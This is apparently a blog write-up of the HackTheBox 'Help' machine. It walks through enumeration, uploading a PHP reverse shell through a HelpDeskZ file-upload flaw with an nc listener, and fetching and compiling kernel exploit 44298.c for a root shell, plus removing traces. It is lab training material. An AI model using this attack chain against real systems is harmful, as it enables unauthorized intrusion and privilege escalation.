HackTheBox – Help

A port scan using nmap –A reveals the following.

The initial attack surface appears to be the apache server hosted on port 80, however this is set up as the default apache page.

Further enumeration of this using dirb http:/// reveals a few directories to look at, I’m particularly interested in /support.

Navigating to this page opens what appears to be a help desk client which should hopefully have a vulnerability to exploit.

Using searchsploit helpdeskz provides 2 known exploits.

As I don’t have authentication to carry out the SQL injection exploit, the file upload exploit appears to be a promising way in, perhaps I could upload a reverse shell.
A little research into this vulnerability confirms that I should be able to.

As per the instructions I filled out a ticket with a PHP reverse shell attached (I used the shell that comes with Kali Linux, /usr/share/shells/webshells/php/php-reverse-shell)

The next step is to find where the shell is uploaded to, checking back to my dirb results shows that there is an uploads subdirectory in support.

This is looking promising so I set up a listener using nc –lvp 4321 (The port number that I specified within my reverse shell).

Unfortunately this yielded no results.

Looking back at the exploit description, the filename is generated as an md5 hash using the time on the system, using this information I did a little digging on the webpage itself. The response headers for the page show that the time zone is GMT (I’m running on BST, so this will need to be changed!)

I changed my system time to run off GMT.

I then resubmitted my shell, just to be sure.

I was then greeted by this message, which I ignored, hoping that my file had uploaded anyway.

I then set up my listener again using nc –lvp 4321, ran the python script to find the file and bingo! I have a shell!

Once in I used python -c ‘import pty; pty.spawn(“/bin/bash”)’ to spawn a bash environment (Just my preference) and went for the user hash.

Ok, now I want to get the root flag, I started up an apache server on my machine to allow me to download some scripts onto Help.

Over on Help, I downloaded an enumeration script called BeRoot and unzipped the contents.

With the file downloaded, good practice tells me to turn off apache before confirming where my script is located.

Using python beroot.py launches the script and finds quite a few potential attack vectors.

As I don’t have the password to Help, I can’t use any of the techniques using sudo. What is interesting though is that there is a vulnerability in the Linux Kernel.

Now that I have something to work with, I can remove the scripts that I downloaded, both to cover my tracks a little and not to spoil the box for anyone else.

Using searchsploit linux 4.4.0 provides a small list of privilege escalation scripts.

Despite being described for use on Ubuntu 16.04.4, when Help is running Ubuntu 16.04.5 the file 44298.c is the correct script in this case, I discovered this after trying a couple of the other ones unsuccessfully. I used my apache server again to download the file.

I used gcc –o rootpls 44298.c to compile the program with the name rootpls and running the program using ./rootpls successfully spawned a root shell!

First things first, I’ll clean up my mess.

And now it’s just a case of reading the root flag.

%d bloggers like this:
search previous next tag category expand menu location phone mail time cart zoom edit close